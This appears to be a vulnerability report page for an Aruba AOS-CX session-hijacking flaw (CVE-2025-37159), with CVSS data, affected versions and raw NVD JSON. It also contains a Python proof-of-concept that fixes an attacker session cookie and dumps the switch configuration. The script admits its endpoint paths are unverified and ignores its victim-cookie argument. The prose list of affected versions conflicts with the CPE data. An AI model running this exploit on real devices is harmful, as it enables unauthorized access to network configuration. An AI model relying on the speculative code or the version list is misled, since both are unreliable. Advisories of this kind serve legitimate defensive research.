Security Vulnerability Report
CVE-2025-37159 CVSS 5.8 MEDIUM

CVE-2025-37159

Published: 2025-11-18 19:15:48
Last Modified: 2025-12-04 18:19:19

Description

A vulnerability in the web management interface of the AOS-CX OS user authentication service could allow an authenticated remote attacker to hijack an active user session. Successful exploitation may enable the attacker to maintain unauthorized access to the session, potentially leading to the view or modification of sensitive configuration data.

CVSS Details

CVSS Score (Secondary metric): 5.8
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N

CVSS Score (Primary metric): 7.3
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N

Weakness: CWE-384 (Session Fixation)

Note: the two recorded vectors disagree on attack vector and privileges required. The 5.8 vector rates the issue as local with high privileges, while the description and the 7.3 vector treat it as reachable over the network by a low-privileged authenticated user. Both metrics appear in the raw JSON record at the end of this report; for prioritisation, treat the network-reachable reading as the conservative one.

Configurations (Affected Products)

cpe:2.3:o:hpe:arubaos-cx:*:*:*:*:*:*:*:* - VULNERABLE, versions from 10.10.0000 up to (excluding) 10.10.1170
cpe:2.3:o:hpe:arubaos-cx:*:*:*:*:*:*:*:* - VULNERABLE, versions from 10.13.0000 up to (excluding) 10.13.1101
cpe:2.3:o:hpe:arubaos-cx:*:*:*:*:*:*:*:* - VULNERABLE, versions from 10.14.0000 up to (excluding) 10.14.1060
cpe:2.3:o:hpe:arubaos-cx:*:*:*:*:*:*:*:* - VULNERABLE, versions from 10.15.0000 up to (excluding) 10.15.1030
cpe:2.3:o:hpe:arubaos-cx:*:*:*:*:*:*:*:* - VULNERABLE, versions from 10.16.0000 up to (excluding) 10.16.1001
Aruba AOS-CX < 10.14.xxxx (official fixed version to be confirmed)
Aruba AOS-CX 10.13.xxxx series
Aruba AOS-CX 10.12.xxxx series
Aruba AOS-CX 10.11.xxxx series

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import sys

import requests

# CVE-2025-37159 PoC - Aruba AOS-CX Session Hijacking
# This PoC demonstrates a session fixation / hijacking vulnerability.
# The endpoint paths below are as given in the original PoC and are not
# verified against AOS-CX REST API documentation.


def exploit_session_hijacking(target_url, attacker_session_id, target_session_cookie):
    """
    Attempt to hijack an active user session in Aruba AOS-CX.

    Args:
        target_url: Target AOS-CX web management interface URL
        attacker_session_id: Session ID controlled by attacker
        target_session_cookie: Current active session cookie (accepted but not used by this script)

    Returns:
        bool: True if session hijacking successful, False otherwise
    """
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
        'Cookie': f'ARUBA_SESSION={attacker_session_id}',
        'X-CSRF-Token': 'attacker_controlled_token',
    }

    # Step 1: Attempt to set/fix session ID
    init_url = f"{target_url}/v1/configuration/session"
    response = requests.post(init_url, headers=headers, verify=False, timeout=10)

    if response.status_code == 200:
        # Step 2: Verify session is active and has privileges
        config_url = f"{target_url}/v1/configuration/system"
        verify_response = requests.get(config_url, headers=headers, verify=False, timeout=10)

        if verify_response.status_code == 200:
            print("[+] Session hijacking successful!")
            print(f"[!] Attacker now has access with session: {attacker_session_id}")

            # Step 3: Extract sensitive configuration
            dump_url = f"{target_url}/v1/configuration/full"
            dump_response = requests.get(dump_url, headers=headers, verify=False, timeout=10)

            if dump_response.status_code == 200:
                print(f"[+] Configuration dump retrieved: {len(dump_response.text)} bytes")
                return True

    print("[-] Session hijacking failed")
    return False


if __name__ == '__main__':
    if len(sys.argv) < 4:
        print(f"Usage: python {sys.argv[0]} <target_url> <attacker_session_id> <target_cookie>")
        sys.exit(1)

    target = sys.argv[1]
    attacker_sid = sys.argv[2]
    target_cookie = sys.argv[3]
    exploit_session_hijacking(target, attacker_sid, target_cookie)

References

https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04888en_us&docLocale=en_US (Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-37159",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-18T19:15:47.980",
    "lastModified": "2025-12-04T18:19:18.950",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "A vulnerability in the web management interface of the AOS-CX OS user authentication service could allow an authenticated remote attacker to hijack an active user session. Successful exploitation may enable the attacker to maintain unauthorized access to the session, potentially leading to the view or modification of sensitive configuration data."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N", "baseScore": 5.8, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"},
          "exploitabilityScore": 0.6,
          "impactScore": 5.2
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"},
          "exploitabilityScore": 2.1,
          "impactScore": 5.2
        }
      ]
    },
    "weaknesses": [
      {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-384"}]}
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {"vulnerable": true, "criteria": "cpe:2.3:o:hpe:arubaos-cx:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.10.0000", "versionEndExcluding": "10.10.1170", "matchCriteriaId": "3FEB3830-A052-4585-BF45-9E221FA06D43"},
              {"vulnerable": true, "criteria": "cpe:2.3:o:hpe:arubaos-cx:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.13.0000", "versionEndExcluding": "10.13.1101", "matchCriteriaId": "0490B2CA-4273-426E-8776-814D242834B0"},
              {"vulnerable": true, "criteria": "cpe:2.3:o:hpe:arubaos-cx:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.14.0000", "versionEndExcluding": "10.14.1060", "matchCriteriaId": "21AC81E3-A4C8-4120-AEEA-46123B84A250"},
              {"vulnerable": true, "criteria": "cpe:2.3:o:hpe:arubaos-cx:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.15.0000", "versionEndExcluding": "10.15.1030", "matchCriteriaId": "FB5ADE5E-72CB-41E0-B7A0-08BEBB94ED8E"},
              {"vulnerable": true, "criteria": "cpe:2.3:o:hpe:arubaos-cx:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.16.0000", "versionEndExcluding": "10.16.1001", "matchCriteriaId": "5CF58D01-F13F-4DAF-B6A1-D91AEC7F19B3"}
            ]
          }
        ]
      }
    ],
    "references": [
      {"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04888en_us&docLocale=en_US", "source": "[email protected]", "tags": ["Vendor Advisory"]}
    ]
  }
}